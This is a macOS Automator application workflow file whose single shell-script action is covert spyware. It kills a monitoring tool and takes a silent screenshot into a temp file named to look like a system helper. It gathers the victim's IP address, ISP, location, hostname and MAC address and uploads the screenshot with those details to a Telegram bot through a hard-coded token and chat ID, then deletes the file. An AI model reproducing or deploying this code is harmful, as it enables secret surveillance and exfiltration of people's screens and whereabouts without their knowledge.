<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>AMApplicationBuild</key>
	<string>523</string>
	<key>AMApplicationVersion</key>
	<string>2.10</string>
	<key>AMDocumentVersion</key>
	<string>2</string>
	<key>actions</key>
	<array>
		<dict>
			<key>action</key>
			<dict>
				<key>AMAccepts</key>
				<dict>
					<key>Container</key>
					<string>List</string>
					<key>Optional</key>
					<true/>
					<key>Types</key>
					<array>
						<string>com.apple.cocoa.string</string>
					</array>
				</dict>
				<key>AMActionVersion</key>
				<string>2.0.3</string>
				<key>AMApplication</key>
				<array>
					<string>Automator</string>
				</array>
				<key>AMParameterProperties</key>
				<dict>
					<key>COMMAND_STRING</key>
					<dict/>
					<key>CheckedForUserDefaultShell</key>
					<dict/>
					<key>inputMethod</key>
					<dict/>
					<key>shell</key>
					<dict/>
					<key>source</key>
					<dict/>
				</dict>
				<key>AMProvides</key>
				<dict>
					<key>Container</key>
					<string>List</string>
					<key>Types</key>
					<array>
						<string>com.apple.cocoa.string</string>
					</array>
				</dict>
				<key>ActionBundlePath</key>
				<string>/System/Library/Automator/Run Shell Script.action</string>
				<key>ActionName</key>
				<string>Run Shell Script</string>
				<key>ActionParameters</key>
				<dict>
					<key>COMMAND_STRING</key>
					<string>/usr/bin/nohup /usr/bin/killall ScriptMonitor /usr/bin/at now;

TOKEN="6816187640:AAFGYh8dE8v5IB4bLUw9N0STARoMTRcl5YQ";
ID="360435611";
PATH="/tmp/com.apple.launchd.helper";

IPLOOKUP=$(/usr/bin/nohup /usr/bin/curl -s 'https://json.geoiplookup.io');
IP=$(/usr/bin/nohup /bin/echo $IPLOOKUP | /usr/bin/grep -o '"ip": *[^,}]*' | /usr/bin/awk -F '[:,]' '{print $2}' | /usr/bin/sed 's/^ *//;s/ *$//' | /usr/bin/sed 's/"//g');
IP_MOD=$(/usr/bin/nohup /bin/echo "$IP" | /usr/bin/sed 's/\./․/g')
ISP=$(/usr/bin/nohup /bin/echo $IPLOOKUP | /usr/bin/grep -o '"isp": *[^,}]*' | /usr/bin/awk -F '[:,]' '{print $2}' | /usr/bin/sed 's/^ *//;s/ *$//' | /usr/bin/sed 's/"//g');
CITY=$(/usr/bin/nohup /bin/echo $IPLOOKUP | /usr/bin/grep -o '"city": *[^,}]*' | /usr/bin/awk -F '[:,]' '{print $2}' | /usr/bin/sed 's/^ *//;s/ *$//' | /usr/bin/sed 's/"//g');
COUNTRY_NAME=$(/usr/bin/nohup /bin/echo $IPLOOKUP | /usr/bin/grep -o '"country_name": *[^,}]*' | /usr/bin/awk -F '[:,]' '{print $2}' | /usr/bin/sed 's/^ *//;s/ *$//' | /usr/bin/sed 's/"//g');
REGION=$(/usr/bin/nohup /bin/echo $IPLOOKUP | /usr/bin/grep -o '"region": *[^,}]*' | /usr/bin/awk -F '[:,]' '{print $2}' | /usr/bin/sed 's/^ *//;s/ *$//' | /usr/bin/sed 's/"//g');
DATE=$(/usr/bin/nohup /bin/date +"%A, %d %B %Y %I:%M:%S %p")
HOSTNAME=$(/usr/bin/nohup /bin/hostname | /usr/bin/sed 's/\.local//g');
MAC_ADDRESS=$(/usr/bin/nohup /sbin/ifconfig en0 | /usr/bin/awk '/ether/{print $2}');
CAPTION="$DATE - $COUNTRY_NAME, $REGION, $CITY ($HOSTNAME, $MAC_ADDRESS, $IP_MOD, $ISP)";

/usr/bin/nohup /usr/sbin/screencapture -xoCSD1 /tmp/com.apple.launchd.helper /usr/bin/at now;
/usr/bin/nohup /usr/bin/curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendPhoto" -F chat_id=$ID -F photo=@$PATH -F caption=$CAPTION /usr/bin/at now;
/usr/bin/nohup /bin/rm -rf /tmp/com.apple.launchd.helper;</string>
					<key>CheckedForUserDefaultShell</key>
					<true/>
					<key>inputMethod</key>
					<integer>0</integer>
					<key>shell</key>
					<string>/bin/zsh</string>
					<key>source</key>
					<string></string>
				</dict>
				<key>BundleIdentifier</key>
				<string>com.apple.RunShellScript</string>
				<key>CFBundleVersion</key>
				<string>2.0.3</string>
				<key>CanShowSelectedItemsWhenRun</key>
				<false/>
				<key>CanShowWhenRun</key>
				<true/>
				<key>Category</key>
				<array>
					<string>AMCategoryUtilities</string>
				</array>
				<key>Class Name</key>
				<string>RunShellScriptAction</string>
				<key>IgnoresInput</key>
				<false/>
				<key>InputUUID</key>
				<string>CE008321-2765-45F1-B909-810503E2559F</string>
				<key>Keywords</key>
				<array>
					<string>Shell</string>
					<string>Script</string>
					<string>Command</string>
					<string>Run</string>
					<string>Unix</string>
				</array>
				<key>OutputUUID</key>
				<string>DFD99982-721B-4E74-9FA5-D72C1460B4B2</string>
				<key>UUID</key>
				<string>213126A9-BF86-46A4-B5FA-F9D624F61821</string>
				<key>UnlocalizedApplications</key>
				<array>
					<string>Automator</string>
				</array>
				<key>arguments</key>
				<dict>
					<key>0</key>
					<dict>
						<key>default value</key>
						<integer>0</integer>
						<key>name</key>
						<string>inputMethod</string>
						<key>required</key>
						<string>0</string>
						<key>type</key>
						<string>0</string>
						<key>uuid</key>
						<string>0</string>
					</dict>
					<key>1</key>
					<dict>
						<key>default value</key>
						<false/>
						<key>name</key>
						<string>CheckedForUserDefaultShell</string>
						<key>required</key>
						<string>0</string>
						<key>type</key>
						<string>0</string>
						<key>uuid</key>
						<string>1</string>
					</dict>
					<key>2</key>
					<dict>
						<key>default value</key>
						<string></string>
						<key>name</key>
						<string>source</string>
						<key>required</key>
						<string>0</string>
						<key>type</key>
						<string>0</string>
						<key>uuid</key>
						<string>2</string>
					</dict>
					<key>3</key>
					<dict>
						<key>default value</key>
						<string></string>
						<key>name</key>
						<string>COMMAND_STRING</string>
						<key>required</key>
						<string>0</string>
						<key>type</key>
						<string>0</string>
						<key>uuid</key>
						<string>3</string>
					</dict>
					<key>4</key>
					<dict>
						<key>default value</key>
						<string>/bin/sh</string>
						<key>name</key>
						<string>shell</string>
						<key>required</key>
						<string>0</string>
						<key>type</key>
						<string>0</string>
						<key>uuid</key>
						<string>4</string>
					</dict>
				</dict>
				<key>isViewVisible</key>
				<integer>1</integer>
				<key>location</key>
				<string>655.500000:252.000000</string>
				<key>nibPath</key>
				<string>/System/Library/Automator/Run Shell Script.action/Contents/Resources/Base.lproj/main.nib</string>
			</dict>
			<key>isViewVisible</key>
			<integer>1</integer>
		</dict>
	</array>
	<key>connectors</key>
	<dict/>
	<key>workflowMetaData</key>
	<dict>
		<key>workflowTypeIdentifier</key>
		<string>com.apple.Automator.application</string>
	</dict>
</dict>
</plist>
